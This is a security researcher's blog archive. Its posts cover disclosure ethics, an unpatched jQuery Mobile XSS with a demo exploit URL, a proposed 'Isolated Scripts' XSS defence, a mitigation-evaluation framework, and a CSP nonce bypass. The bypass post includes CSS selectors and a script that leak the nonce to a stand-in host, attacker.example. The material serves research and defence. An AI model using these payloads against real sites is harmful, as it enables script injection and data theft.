Saturday, February 11, 2017

Vulnerability disclosure in an era of vulnerability rewards

Note: This (and every post in this blog) is a personal blog post which expresses my personal opinion, and doesn't necessarily reflect the opinion of my employer.

Recently a few bug hunters have been making the rounds on the internet, looking for vulnerabilities and then contacting the website owners asking for money to disclose them. This prompted a discussion on Twitter which I thought was interesting.

What we know today as Bug Bounty Programs (or, more aptly named, Vulnerability Reward Programs) was started by individuals proactively searching for vulnerabilities on their own time for fun, curiosity, or to evaluate the security of the software they use, and then reporting them publicly or privately to the vendors. In many cases, these bug hunters got no permission or blessing from the vendor ahead of time, but vendors found the activity useful, so they decided to formalize it and launched reward programs. Fast forward to 2017 and tens of millions of dollars have been paid to thousands of bug hunters all around the world. That turned out pretty well, after all.

However, this created a new normal, where bug hunters might expect to get paid for their research "per bug". And consequently, it also created an incentive for a few bug hunters to reach out to vendors without these programs, hoping to convince them to start one. I don't think the bug hunters doing that are "bad people". What they are doing is slightly better than sitting on the bugs, or sharing them on private forums as used to be the norm 10 years ago, and while I definitely think they should be disclosing the vulns and getting them fixed, I respect their freedom not to.

That said, this leaves vendors without reward programs (whether for lack of money or lack of support) in an awkward position, in that they get the worst of both worlds: little attention from skilled professional bug hunters, and tons of attention from those that are just looking to make money out of it. And at least some of those vendors ended up perceiving the behavior as extortion.

This can result in a very dangerous "us vs. them" mentality. We shouldn't be fighting with each other on this. We shouldn't be calling each other scammers. That only burns bridges and alienates the bug hunters we most need to work closely with.

What I think we should do, as vendors, is politely and consistently decline every attempt to disclose issues in a way that is unfair or dangerous to users and other bug hunters. That means, if you can't give out rewards, don't cave in to those asking you for money by email. If you already have a reward program, don't bend or change the rules for these people.

Instead, we, as vendors, have to invest in creating a community of bug hunters around us. Many people are willing to invest time to help vendors, even when money is not involved. Reasons for that vary (they do it for the challenge, curiosity, or fun), and in exchange for their help, many of them appreciate a "thank you" and recognition in an advisory. Vendors need to be welcoming, transparent and appreciative. This is important for any vendor that wants to collaborate with independent security researchers, even more important for those vendors just starting to build their community, and especially important for those that need a lot of help and don't have many resources.

What I think we should do, as security researchers, is to not let a few vendors give the wrong impression of the rest of the industry. We should continue to be curious, and continue to advance the state of the art. However, just as jaywalking carries risks, we need to be careful about how we do this work. Pentesting without authorization is very risky, even more so if the testing causes damage, or gives the impression it was malicious.

Instead, as researchers we should treat vendors as we would treat our neighbors: be respectful and polite, and don't do to them what we wouldn't want them to do to us. I think 99.99% of researchers already behave like this, and the few that don't are just learning. Let's make sure we continue to grow our community with respect and humility and help those that are just starting.

The security disclosure world of today is a lot better than how it was 10 to 20 years ago, and I'm glad to see such great relationships between vendors and security researchers. Let's keep on improving it 😊.

Wednesday, February 08, 2017

🤷 Unpatched (0day) jQuery Mobile XSS

TL;DR - Any website that uses jQuery Mobile and has an open redirect is now vulnerable to XSS - and there's nothing you can do about it; there's not even a patch ¯\_(ツ)_/¯.

jQuery Mobile is a cool jQuery UI system that makes building mobile apps easier. It does some part of what other frameworks like Ember and Angular do for routing. Pretty cool, and useful. Also vulnerable to XSS.

While researching CSP bypasses a few months ago, I noticed that jQuery Mobile had this funky behavior in which it would fetch any URL in the location.hash and put it in innerHTML. I thought that was pretty weird, so decided to see if it was vulnerable to XSS.

Turns out it is!

The bug


The summary is:

  1. jQuery Mobile checks if you have anything in location.hash.
  2. If your location.hash looks like a URL, it will try to set history.pushState on it, then it will do an XMLHttpRequest to it.
  3. Then it will just innerHTML the response.
As a strange saving grace, the fact that it tries to call history.pushState first makes the attack a little bit harder to pull off, since you can't set history.pushState to cross-origin URLs, so in theory this should be safe.

But it isn't, because if you have any open redirect you are suddenly vulnerable to XSS, since the open redirect is same-origin as far as history.pushState is concerned.
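
To make the flow concrete, here is a rough sketch of the behavior described above (illustrative only, not jQuery Mobile's actual source):

// Illustrative sketch only - not jQuery Mobile's real code.
var hash = location.hash.slice(1);        // e.g. "/redirect?url=http://attacker.example/payload.html"
if (hash.charAt(0) === '/') {             // simplified "looks like a URL" check
  history.pushState({}, '', hash);        // throws for cross-origin URLs...
  var xhr = new XMLHttpRequest();         // ...but an open redirect is same-origin at this point
  xhr.open('GET', hash);
  xhr.onload = function () {
    // The redirect target's markup (attacker-controlled) lands in the DOM.
    document.getElementById('page').innerHTML = xhr.responseText;
  };
  xhr.send();
}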

So.. you want to see a demo, I'm sure. Here we go:
http://jquery-mobile-xss.appspot.com/#/redirect?url=http://sirdarckcat.github.io/xss/img-src.html
The code is here (super simple).

The disclosure


Fairly simple bug, super easy to find! I wouldn't be surprised if other people had found out about this already. But I contacted jQuery Mobile, and told them about this, and explained the risk.

The jQuery Mobile team explained that they consider the Open Redirect to be the vulnerability, not their behavior of fetching and inlining, and that they wouldn't want to make a change because that might break existing applications. This means that there won't be a patch, as far as I have been informed. The jQuery Mobile team suggests returning a 403 for all XHR requests that might result in a redirect.
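
For illustration, here's a rough sketch of what that suggestion might look like, assuming an Express-style server and a client that sends the conventional X-Requested-With header (jQuery's $.ajax does for same-origin requests); the endpoint and parameter names simply mirror the demo URL above:

var express = require('express');
var app = express();

app.get('/redirect', function (req, res) {
  if (req.get('X-Requested-With') === 'XMLHttpRequest') {
    // Refuse to redirect AJAX requests, so jQuery Mobile's XHR never follows the redirect.
    return res.status(403).end();
  }
  res.redirect(req.query.url);   // regular navigations still get the redirect
});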

This means that every website that uses jQuery Mobile, and has any open redirect anywhere is vulnerable to XSS.

Also, as a bonus, even if you use a CSP policy with nonces, the bug is still exploitable today by stealing the nonce first. The only type of CSP policy that is safe is one that uses hashes or whitelists alone.

The victim

jQuery Mobile is actually pretty popular! Here's a graph of Stack Overflow questions, over time.

And here's a graph of jQuery Mobile usage statistics over time as well:

You can recreate these graphs here and here. So, we can say we are likely to see this in around 1 or 2 websites that we visit every week. Pretty neat, IMHO.

I don't know how common open redirects are, but I know that most websites have them. Google doesn't consider them vulnerabilities (disclaimer: I work at Google - but this is a personal blog post), but OWASP does (disclaimer: I also considered them to be vulnerabilities in 2013). So, in a way, I don't think jQuery Mobile is completely wrong in ignoring this.

Now, I wanted to quantify how common it is to have an open redirect anyway, so I decided to go to Alexa and list an open redirect for some of the top websites. Note that "open redirect" in this context includes "signed" redirects, since those can be used for XSS.

Here's a list from Alexa:
  1. Google
  2. YouTube
  3. Facebook
  4. Baidu
  5. Yahoo
I also thought it would be interesting to find an open redirect on jQuery's website, to see whether a random site, and not just the top ones, might have one. While I did find that they use Trac, which has an Open Redirect, I wasn't able to test it because I don't have access to their bug tracker =(.

Conclusion

One opportunity for further research, if you have time on your hands, is to try to find a way to make this bug work without the need for an Open Redirect. I tried to make it work, but it didn't work out.

In my experience, Open Redirects are very common, and they are also a common source of bugs (some of them cool). Perhaps we should start fixing Open Redirects. Or perhaps we should be more consistent about not treating them as vulnerabilities. Either way, for as long as we have this disagreement in our industry, we at least get to enjoy some XSS bugs.

If you feel motivated to do something about this, the jQuery team suggested sending a pull request to their documentation to warn developers of this behavior, so I encourage you to do that! Or just help me spread the word about this bug.

Thanks for reading, and I hope you liked this! If you have any comments please comment below or on Twitter. =)

Wednesday, January 25, 2017

Fighting XSS with 🛡️ Isolated Scripts

TL;DR: Here's a proposal for a new way to fight Cross-Site Scripting vulnerabilities called Isolated Scripts. There's an open-source prototype so you can play with the idea. Please let me know what you think!

Summary

In the aftermath of all the Christmas CSP bypasses, a discussion came up with @mikewest and @fgrx on the merits of using the Isolated Worlds concept (explained below) as a security mitigation against XSS. It seemed like an interesting problem, so I spent some time looking into it.

The design described below would allow you (a web developer) to defend some of your endpoints against XSS with just two simple steps:
  1. Set a new cookie flag (isolatedScript=true).
  2. Set a single HTTP header (Isolated-Script: true).
And that's it. With those two things you could defend your applications against XSS. It is similar to Suborigins but Isolated Scripts defends against XSS even within the same page!

And that's not all: another advantage is that it also mitigates risk from third-party JavaScript code (such as ads, analytics, etcetera). Neat, isn't it?

Design

The design of Isolated Scripts consists of three components that work together to deliver the Isolated Scripts proposal.
  1. Isolated Worlds
  2. Isolated Cookies
  3. Secret HTML
I describe each one of them below and then show you the demo.

๐ŸŒ Isolated Worlds


Isolated Worlds is a concept most prominently used today in Chrome Extensions user scripts, and Greasemonkey scripts in Firefox - essentially, they allow JavaScript code to get a "view" over the document's DOM but in an isolated JavaScript runtime. Let me explain:

Let's say that there is a website with code along these lines:


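// Minimal sketch of the page described below (not the original snippet).
// Page script, running in the page's own ("main") world:
window.variable = "page secret";                 // a plain JS global on the page
document.body.innerHTML = '<div id="text">Hello!</div>';

// User script, running in an Isolated World over the same document:
console.log(document.getElementById("text"));    // works - the DOM view is shared
console.log(window.variable);                    // undefined - JS objects are not shared
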
The Isolated World will have access to document.getElementById("text") but it will not have access to window.variable. That is, the only thing the two scripts share is an independent view of the HTML's DOM. This isolation is very important, because user scripts have elevated privileges; for example, they can trigger XMLHttpRequest requests to any website and read their responses.

If it weren't for the Isolated World, then the page could do something like this to execute code in the user script, and attack the user:
document.getElementById = function() {
    // Grab the Function constructor from the privileged caller's realm and run attacker code there.
    arguments.callee.caller.constructor("attack()")();
};
In this way, the Isolated World allows us to defend our privileged execution context from the hostile user execution context. Now, the question is: Can we use the same design to protect trusted scripts from Cross-Site Scripting vulnerabilities?

That is, instead of focusing on preventing script execution as a mitigation (which we've found out to be somewhat error prone), why don't we instead focus on differentiating trusted scripts from untrusted scripts?

The idea of having privileged and unprivileged scripts running in the same DOM is not new; in fact, there are a few implementations out there (such as Mario Heiderich's IceShield, and Antoine Delignat-Lavaud's Defensive JS), but their implementations required rewriting code to overcome the hostile attacker. In Isolated Worlds, normal JavaScript code just works.

So, that is the idea behind Isolated Scripts - provide a mechanism for a web author to mark a specific script as trusted, which the browser will then run in an Isolated World.
An easy way to implement this in a demo is by reusing the Isolated Worlds implementation in Chrome Extensions, and simply installing a user script for every script served with the right response header.
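
As a sketch of how that could be wired up (not necessarily how the actual demo extension does it), the extension's background page could watch for the response header and re-run matching scripts as content scripts, which Chrome already executes in an isolated world:

// Sketch only: background.js of a demo extension.
chrome.webRequest.onHeadersReceived.addListener(function (details) {
  var isolated = (details.responseHeaders || []).some(function (h) {
    return h.name.toLowerCase() === 'isolated-script';
  });
  if (isolated && details.type === 'script' && details.tabId >= 0) {
    // Fetch the script body and run it in the tab's isolated (content script) world.
    fetch(details.url, { credentials: 'include' })
      .then(function (r) { return r.text(); })
      .then(function (code) {
        chrome.tabs.executeScript(details.tabId, { code: code });
      });
  }
}, { urls: ['<all_urls>'] }, ['responseHeaders']);

In a real implementation you would also want to stop the original script from running in the page's main world, but that detail is omitted here.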

๐Ÿช Isolated Cookies


Now that we have a script running in a trusted execution context, we need a way for the web server to identify requests coming from it. This is needed because the server might only want to expose some sensitive data to Isolated Scripts.

The easiest way to do so would be simply by adding a new HTTP request header similar to the Origin header (we could use Isolated-Script: foo.js for example). Another alternative is to create a new type of cookie that is only sent when the request comes from an Isolated Script. This alternative is superior to the HTTP header for two reasons:
  1. It is backwards compatible, browsers that don't implement it will just send the cookie as usual.
  2. It can work in conjunction with Same-site cookies (which mitigates CSRF as well).
To clarify, the web server would do this:
Set-Cookie: SID=XXXX; httpOnly; secure; SameSite=Strict; isolatedScript

And the browser will then process the cookie as usual, except that it will only include it in requests made by the Isolated Script. Browsers that don't understand the new flag will always include it.

An easy way to implement this in a demo is, instead of using a flag, to use a special name for the cookie and refuse to send it except when the request comes from the isolated script.
One idea that Devdatta proposed was to make use of cookie prefixes, which could also protect the cookies from clobbering attacks.

🙈 Secret HTML


What we have now is a mechanism for a script to have extra privileges, and be protected from hostile scripts by running in an isolated execution context. However, the script will, of course, want to display data to the user, and if it writes that data to the DOM, the malicious script would immediately be able to read it. So we need a way for the Isolated Script to write HTML that the hostile scripts can't read.

While this primitive might sound new, it actually already exists today! It's already possible for JavaScript code to write HTML that is visible to the user, but unavailable to the DOM. There are at least two ways to do this:
  1. Creating an iframe and then navigating the iframe to a data:text/html URL (it doesn't work in Firefox because they treat data: URLs as same-origin).
  2. Creating an iframe with a sandbox attribute without the allow-same-origin flag (works in Chrome and Firefox).
So, to recap, we can already create HTML nodes that are inaccessible to the parent page. The only issue left is perhaps how to make it easily backwards compatible. So we have two problems left:
  • CSS wouldn't be propagated down to the iframe, but to solve this problem we can propagate the computed style down to the iframe's body, which will allow us to ensure that the text looks the same as if it were in the parent page (note, however, that selectors wouldn't work inside it).
  • Events wouldn't propagate to the parent page, but to solve that problem we could just install a simple script that forwards all events from the iframe up to the parent document.
With this, the behavior would be fairly similar to regular HTML, but without providing a significant information leak to the hostile script.
An easy way to implement this in a demo is to create a setter function on innerHTML, and whenever the isolated script tries to set innerHTML we instead create a sandboxed iframe with the content, to which we postMessage the CSS and the HTML, plus a message channel that can be used to propagate events up from the iframe. To avoid confusing other code dependencies, we could create this iframe inside a closed Shadow DOM.
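
Here's a simplified sketch of that idea (the demo hooks innerHTML itself and uses a message channel for events; this version only shows the sandboxed iframe and the style/HTML hand-off):

// Sketch: render "secret" HTML into a sandboxed iframe hidden behind a closed shadow root.
function setSecretHTML(container, html) {
  var host = document.createElement('div');
  var shadow = host.attachShadow({ mode: 'closed' });   // hides the plumbing from page scripts
  var frame = document.createElement('iframe');
  frame.setAttribute('sandbox', 'allow-scripts');       // no allow-same-origin: opaque to the page
  frame.style.border = '0';
  // A tiny bootstrap inside the frame applies the style and HTML it receives.
  frame.src = 'data:text/html,' + encodeURIComponent(
    '<script>onmessage = function (e) {' +
    '  document.body.style.cssText = e.data.style;' +
    '  document.body.innerHTML = e.data.html;' +
    '};<\/script>');
  frame.onload = function () {
    frame.contentWindow.postMessage({
      html: html,
      style: getComputedStyle(container).cssText        // so the text looks like the parent page
    }, '*');
  };
  shadow.appendChild(frame);
  container.appendChild(host);
}

Events from inside the frame would then be forwarded back up with another postMessage listener, as described above.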
One potential concern for the design of this feature that Malte brought up was that, depending on the implementation, this could potentially mess with the developer experience, as some scripts most likely assume that content in the DOM is reachable (eg, via querySelector, getElementsByTagName or otherwise). This is very important, and possibly the most valuable lesson to take away - rather than having security folks like me design APIs with weird restrictions, we should also be asking authors what they need to do their work.

Demo

Alright! So now that I explained the concept and how it was implemented in the demo, it's time for you to see it in action.

First of all, to emulate the browser behavior you need to install a Chrome extension (don't worry, no scary permissions), and then just go to the "vulnerable website" and try to steal the contents of the XHR response! If you can steal them, you win a special Isolated Scripts 👕 T-Shirt, I mean, my eternal gratitude 🙏 (and, of course, 🎤 fame & glory).

So, let's do it!
  1. Install Chrome Extension
  2. Go to Proof of Concept website
There are XSS bugs everywhere on the page (both DOM-based and reflected), and I disabled the XSS filter to make your life easier. I would be super interested to learn about different ways to break this!

Note that there are probably implementation bugs that wouldn't be an issue in a real browser implementation, but please let me know about them anyway (either on twitter or on the comments below), as while they don't negate the design, they are nevertheless something we should keep in mind and fix for the purpose of making this as close to reality as possible.

In case you need it, the source code of the extension is here, and the changes required to disable CSP and enable Isolated Scripts instead are here.

๐Ÿ” Analysis

Now, I'm obviously biased on this, since I already invested some time in the idea, but I think it's at least promising and has some potential. That said, I want to do an analysis of its value and impact to avoid over-promising. I will use the framework for measuring web security mitigations that I described in my previous blog post (but if you haven't read it, don't worry, I explain it below).

Moderation

Moderation stands for: How much are we limiting the impact of the problem?

In this case, the impact is extremely easy to measure (modulo implementation flaws).
Any secret data that is protected with Isolated Cookies is only exposed to Isolated Scripts. And any data touched by Isolated Scripts is hidden from XSS. So, the web author gets to decide the degree of moderation it requires.
One interesting caveat to this that Mario brought up, is that conducting phishing attacks using XSS would still be possible, and is very likely to result in compromise with a tiny bit of social engineering.

Minimization

Minimization stands for: How much are we minimizing the number of problems?

We can also measure this. Most XSS, including content sniffing and plugin-based SOP bypasses (even some types of universal XSS bugs!), can be mitigated with Isolated Scripts, but some types of DOM XSS aren't.
The DOM XSS bugs that are not mitigated by Isolated Scripts are, for example, Angular template injections and eval()-based XSS - that is because they still inherit the capabilities of the Isolated Script.
I would love to hear of any other types of bugs that wouldn't be mitigated by Isolated Scripts.

Substitution

Substitution stands for: How much are we replacing risks with safer alternatives?

We can also quickly measure how much we are replacing the current risks with Isolated Scripts. In particular, adoption seems very easy although it has some problems:
  1. JavaScript code hosted in CDNs can't run in the Isolated World. This is working as intended, but also might limit the ease of deployment. One easy way to fix this is to use ES6 import statements.
  2. Code that expects to have access to "secret content" (like advertising, for example) won't be able to do so anymore and might fail in unexpected ways (note, however that in a browser implementation it might make sense to actually give access to the secret HTML to the Isolated script, if possible).
I would be super interested to hear any other problems you think developers might find in adoption.

Simplification

Simplification stands for: How much are we removing problems, rather than adding complexity?

Generally, we are adding complexity and removing complexity, and it's somewhat subjective to decide whether they cancel each other out or not.
  • On one hand, we are removing complexity by requiring all interactions with secret data to happen through a single funnel.
  • On the other hand, by adding yet another cookie flag and a new condition for script execution, and a new type of DOM isolation we are making the web platform more difficult to understand.
I honestly think that we are making this a bit more complicated. Not as much as other mitigations, but slightly so. I would be interested to hear any arguments on how "bad" this complexity would be for the web platform.

Conclusion

Thank you so much for reading so far, and I hope you found reading this as interesting as I found writing it.

I think a good next step from here is to hear more feedback on the proposal (from both, authors, browsers and hackers!), and perhaps identify ways we can simplify it further, ways to break it, and ways to make it more developer friendly.

If you have any ideas, please leave comments below or on twitter (or you can also email me).

Until next time 😸

Monday, January 23, 2017

Measuring web security mitigations

Summary: This past weekend I spent some time implementing a prototype for a web security mitigation, and I also spent some time thinking whether it was worth implementing as a web platform feature or not. In this blog post, I want to share how I approached the problem, which I hope you find useful, and to hopefully get your feedback about it too.

I've seen amazing progress on controlling the effects of XSS by adopting inherent safety on software engineering (a term which means focusing on completely eliminating the hazard) and I'm fairly confident that is today's most effective way to tackle it. However, there is always value in evaluating other types of controls beyond pure prevention - perhaps moving on to ways to minimize or contain its risk.

The way I see the problem is that the value of a mitigation can be measured by:
  • Impact - How many vulnerabilities was this mitigation designed to control?
  • Difficulty - What is the cost to adopt this mitigation on a system?
Measuring difficulty is somewhat easy: one just has to try to apply the mitigation to real-life applications and see how difficult it is. Measuring impact, however, can be really difficult in a complex system.

The way this problem was approached in other fields was by measuring mitigations and controls across four metrics (wiki):
  • Moderation - How much are we limiting the impact of the problem?
  • Minimization - How much are we minimizing the number of problems?
  • Substitution - How much are we replacing risks with safer alternatives?
  • Simplification - How much are we removing problems, rather than adding complexity?
So, a naive way to look at this problem, is to evaluate the impact a mitigation has across these four metrics.

For example, I am a fan of Suborigins, an idea that aims to limit the impact a single XSS vulnerability can have by creating a more fine-grained concept of an origin. Suborigins is a good example of Moderation. It does not reduce the number of XSS vulnerabilities, it just makes it so that their impact is significantly reduced. On the other hand, we have the Angular sandbox - it aimed to limit the impact of the problem, but doing so effectively was extremely difficult, and eventually, the sandbox was removed completely.

Another metric is Minimization, and great examples of it are X-Content-Type-Options and X-Frame-Options. These are HTTP headers that allow a site owner to opt out of behavior that can cause clickjacking or some types of content sniffing vulnerabilities. If a website owner deploys these headers across their whole website, then the number of places that are likely to be affected can be drastically reduced. On the other hand, we have browser XSS filters and Web Application Firewalls. After many years, I think our industry reached consensus that they are not real security boundaries, and we largely stopped considering bypasses as security vulnerabilities.

Then we have mitigations that website owners can take that can Substitute a risky behavior with a less risky alternative. A good example for this is the use of JSON.parse instead of eval(). By providing a safe alternative to parse JSON content, the browsers have allowed website developers to write code that parses structured data without having to fully trust the data provider. On the other hand, we have DOM APIs (createElement / setAttribute / appendChild) as a replacement for innerHTML. While the use of DOM APIs is really safer, it's also so much more difficult and inconvenient that developers just don't use it - if the alternative is not easy to adopt, developers just won't adopt it.

And finally, we reach Simplification. A great example of a good, simple API is the httpOnly cookie flag: it does what it says, restricting cookies so that they are available over HTTP only and not to JavaScript, which makes credential stealing (and persistence) really hard in many cases. On the other hand, Ian Hickson (Hixie) eloquently explained the complexity problem with CSP back in 2009:
First, let me state up front some assumptions I'm making:
  • Authors will rely on technologies that they perceive are solving their problems,
  • Authors will invariably make mistakes, primarily mistakes of omission,
  • The more complicated something is, the more mistakes people will make. 
I think a valuable lesson (in retrospect) is that we should aim for baby steps (like httpOnly) that provide obvious simple benefits, and then build up on that, rather than big complex systems with dubious security benefits.


And that's it =) - The purpose of this blog post is not to make a scorecard of different mitigations and their merits, but rather to propose a common language and framework for us to discuss whether a mitigation is valuable or not. Hopefully, so that we can better focus our efforts on those that make the most sense for the internet.

Thanks for reading, and please let me know what you think below or on twitter!

Tuesday, December 27, 2016

How to bypass CSP nonces with DOM XSS 🎅

TL;DR - CSP nonces aren't as effective as they seem to be against DOM XSS. You can bypass them in several ways. We don't know how to fix them. Maybe we shouldn't.

Thank you for visiting. This blog post talks about CSP nonce bypasses. It starts with some context, continues with how to bypass CSP nonces in several situations and concludes with some commentary. As always, this blog post is my personal opinion on the subject, and I would love to hear yours.

My relationship with CSP, "it's complicated"

I used to like Content-Security-Policy. Circa 2009, I used to be really excited about it. My excitement was high enough that I even spent a bunch of time implementing CSP in JavaScript in my ACS project (and to my knowledge this was the first working CSP implementation/prototype). It supported hashes, and whitelists, and I was honestly convinced it was going to be awesome! My abstract started with "How to solve XSS [...]".

But one day one of my friends from elhacker.net (WHK) pointed out that ACS (and CSP by extension) could be trivially circumvented using JSONP. He pointed out that if you whitelist a hostname that contains a JSONP endpoint, you are busted, and indeed there were so many of them that I didn't see an easy way to fix this. My heart was broken. 💔

Fast-forward to 2015, when Mario Heiderich made a cool XSS challenge called "Sh*t, it's CSP!", where the challenge was to escape an apparently safe CSP with the shortest payload possible. Unsurprisingly, JSONP made an appearance (but also Angular and Flash). Talk about beating a dead horse.

And then finally in 2016 a reasonably popular paper called "CSP Is Dead, Long Live CSP!" came out, in which Miki, Lukas, Sebastian and Artur performed an internet-wide survey of CSP deployments and summarized the problems highlighted by WHK and Mario. The conclusion of the paper was that CSP whitelists were completely broken and useless. At least CSP got a funeral, I thought.

However, that was not it. The paper, in turn, advocated for the use of CSP nonces instead of whitelists. A bright future for the new way to do CSP!

When CSP nonces were first proposed, my concern with them was that their propagation seemed really difficult. To solve this problem, dominatrixss-csp back in 2012 made it so that all dynamically generated script nodes would work, by propagating the script nonces with its dynamic resource filter. This made nonce propagation really simple. And so this exact approach was proposed in the paper, and named strict-dynamic, now with user-agent support rather than as a runtime script like dominatrixss-csp. Great improvement. We got ourselves a native dominatrixss!

This new flavor of CSP proposed ignoring whitelists completely and relying solely on nonces. While the deployment of CSP nonces is harder than whitelists (as it requires server-side changes on every single page with the policy), it nevertheless seemed to provide real security benefits, which were clearly lacking in the whitelist-based approach. So yet again, this autumn, I was reasonably optimistic about this new approach. Perhaps there was a way to make most XSS actually *really* unexploitable this time. Maybe CSP wasn't a sham after all!

But this Christmas, as if it were a piece of coal from Santa, Sebastian Lekies pointed out what, in my opinion, seems to be a significant blow to CSP nonces, one that makes CSP almost completely ineffective against many of the XSS vulnerabilities of 2016.

A CSS+CSP+DOM XSS three-way

While CSP nonces indeed seem resilient against 15-year-old XSS vulnerabilities, they don't seem to be so effective against DOM XSS. To explain why, I need to show you how web applications are written nowadays, and how that differs from 2002.

Before, most of the application logic lived on the server, but in the past decade it has been moving more and more to the client. Nowadays, the most effective way to develop a web application is by writing most of the UI code in HTML+JavaScript. This allows, among other things, for making web applications offline-ready, and provides access to an endless supply of powerful web APIs.

Newly developed applications still have XSS; the difference is that, since a lot of the code is written in JavaScript, now they have DOM XSS. And these are precisely the types of bugs that CSP nonces can't consistently defend against (as currently implemented, at least).

Let me give you three examples (non-exhaustive list, of course) of DOM XSS bugs that are common and CSP nonces alone can't defend against:
  1. Persistent DOM XSS where the attacker can force navigation to the vulnerable page, and the payload is not included in the cached response (so it needs to be fetched).
  2. DOM XSS bugs where pages include third-party HTML code (eg, fetch(location.pathName).then(r=>r.text()).then(t=>body.innerHTML=t);)
  3. DOM XSS bugs where the XSS payload is in the location.hash (eg, https://victim/xss#!foo?payload=).
To explain why, we need to travel back in time to 2008 (woooosh!). Back in 2008, Gareth Heyes, David Lindsay and I gave a small presentation at Microsoft BlueHat called CSS - The Sexy Assassin. Among other things, we demonstrated a technique to read HTML attributes purely with CSS3 selectors (which was coincidentally rediscovered by WiSec and presented with kuza55 in their 25C3 talk Attacking Rich Internet Applications a few months later).

The summary of this attack is that it's possible to create a CSS program that exfiltrates the values of HTML attributes character by character, simply by generating an HTTP request every time a CSS selector matches, and repeating consecutively. If you haven't seen this working, take a look here. The way it works is very simple; it just creates CSS attribute selectors of the form:

*[attribute^="a"]{background:url("record?match=a")}
*[attribute^="b"]{background:url("record?match=b")}
*[attribute^="c"]{background:url("record?match=c")}
[...]

And then, once we get a match, repeat with:
*[attribute^="aa"]{background:url("record?match=aa")}
*[attribute^="ab"]{background:url("record?match=ab")}
*[attribute^="ac"]{background:url("record?match=ac")}
[...]

Until it exfiltrates the complete attribute.

The attack for script tags is very straightforward. We need to do the exact same attack, with the only caveat that the script tag needs to be set to display: block;.
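
For example, the injected CSS for one round of nonce guessing could be generated with something like this (ATTACKER is a placeholder for a server you control that records which guess matched):

// Sketch: build CSS that leaks the next character of a <script nonce="..."> attribute.
var ATTACKER = 'https://attacker.example/record';
var CHARSET  = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/-_';
function cssForPrefix(prefix) {
  var css = 'script { display: block; }\n';   // script elements don't render by default
  for (var i = 0; i < CHARSET.length; i++) {
    var guess = prefix + CHARSET[i];
    css += 'script[nonce^="' + guess + '"] { background: url("' +
           ATTACKER + '?match=' + encodeURIComponent(guess) + '"); }\n';
  }
  return css;   // inject this, wait for the matching callback, then repeat with the longer prefix
}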

So we can now extract a CSP nonce using CSS, and the only thing we need in order to do so is the ability to inject multiple times into the same document. The three examples of DOM XSS I gave you above permit exactly that: a way to inject an XSS payload multiple times into the same document. The perfect three-way.

Proof of Concept

Alright! Let's do this =)

First of all, persistent DOM XSS. This one is troubling in particular, because if in "the new world", developers are supposed to write UIs in JavaScript, then the dynamic content needs to come from the server asynchronously.

What I mean by that is that if you write your UI code in HTML+JavaScript, then the user data must come from the server. While this design pattern allows you to control the way applications load progressively, it also makes it so that loading the same document twice can return different data each time.

Now, of course, the question is: How do you force the document to load twice!? With HTTP cache, of course! That's exactly what Sebastian showed us this Christmas.

A happy @slekies wishing you happy CSP holidays! Ho! ho! ho! ho!
Sebastian explained how CSP nonces are incompatible with most caching mechanisms, and provided a simple proof of concept to demonstrate it. After some discussion on twitter, the consequences became quite clear. In a cool-scary-awkward-cool way.

Let me show you with an example, let's take the default Guestbook example from the AppEngine getting started guide with a few modifications that add AJAX support, and CSP nonces. The application is simple enough and is vulnerable to an obvious XSS but it is mitigated by CSP nonces, or is it?

The application above has a very simple persistent XSS. Just submit an XSS payload (eg, <H1>XSS</H1>) and you will see what I mean. But although there is an XSS there, you actually can't execute JavaScript because of the CSP nonce.

Now, let's do the attack. To recap, we will:

  1. Steal the CSP nonce with the CSS attribute reader.
  2. Inject the XSS payload with the stolen CSP nonce.

Stealing the CSP nonce will actually require some server-side code to keep track of the bruteforcing. You can find the code here, and you can run it by clicking the buttons above.

If all worked well, after clicking "Inject the XSS payload", you should have received an alert. Isn't that nice? =). In this case, the cache we are using is the BFCache since it's the most reliable, but you could use traditional HTTP caching as Sebastian did in his PoC.

Other DOM XSS

Persistent DOM XSS isn't the only weakness of CSP nonces. Sebastian demonstrated the same issue with postMessage. Another endpoint that is also problematic is XSS through HTTP "inclusion". This is a fairly common XSS vulnerability that simply consists of fetching some user-supplied URL and echoing it back in innerHTML. It is the equivalent of Remote File Inclusion for JavaScript. The exploit is exactly the same as the others.

Finally, the last PoC of today is one for location.hash, which is also very common. Maybe the reason is IE quirks, but many websites have to use the location hash to implement history and navigation in a single-page JavaScript client. It even has a nickname: "hashbang". In fact, this is so common that every single website that uses jQuery Mobile has this "feature" enabled by default, whether they like it or not.

Essentially, any website that uses the hashbang for internal navigation is as vulnerable to reflected XSS as if CSP nonces weren't there to begin with. How crazy is that! Take a look at the PoC here (Chrome only - Firefox escapes location.hash).

Conclusion

Wow, this was a long blog post... but at least I hope you found it useful, and hopefully now you understand the real effectiveness of CSP a bit better, learned a few browser tricks, and got some ideas for future research.

Is CSP preventing any vulns? Yes, probably! I think all the bugs reported by GOBBLES in 2002 should be preventable with CSP nonces.

Is CSP a panacea? No, definitely not. Its coverage and effectiveness are even more fragile than we (or at least I) originally thought.

Where do we go from here?
  • We could try to lock CSP at runtime, as Devdatta proposed.
  • We could disallow CSS3 attribute selectors to read nonce attributes.
  • We could just give up with CSP. 💩
I don't think we should give up... but I also can't stop wondering whether all this effort we spend on CSP could be better used elsewhere - especially since this mechanism is so fragile that it runs the real risk of creating an illusion of security where it does not exist. And I don't think I'm alone in this assessment. I guess time will tell.

Anyway, happy holidays, everyone! and thank you for reading. If you have any feedback, or comments please comment below or on Twitter!

Hasta luego!

Saturday, December 10, 2016

Vulnerability Pricing

What is the right price for a security vulnerability?

TL;DR: Vendors should focus on vulnerabilities, not on exploits. Vulnerabilities should be priced based on how difficult they are to find, not just on their exploitability.

I've been searching for an answer to this question for a while now, and this blog post is my attempt at answering it, based on my personal opinion.

The first answer is about the economics from the security researchers' perspective. Given that vendors do bug bounties as a way to interact with and give back to the security community, the rewards are mostly targeted towards compensating and showing appreciation. As a result, for these researchers, getting 5k USD for what they did over a few days as a research project or personal challenge is pretty neat.

In contrast, the "grey market" for those looking for vulnerabilities to exploit them (let's call them "exploiters"), the priorities are focused around the vulnerability reliability and stability.

As an "exploiter", you want good, simple, dumb, reliable bugs. For bug hunters, finding these *consistently* is difficult. It's not about giving yourself a challenge to find a bug in Chrome this month, but rather you seek to be able to create a pipeline of new bugs every month and if possible, even grow the pipeline over time. This is way more expensive than "bug hunting for fun".

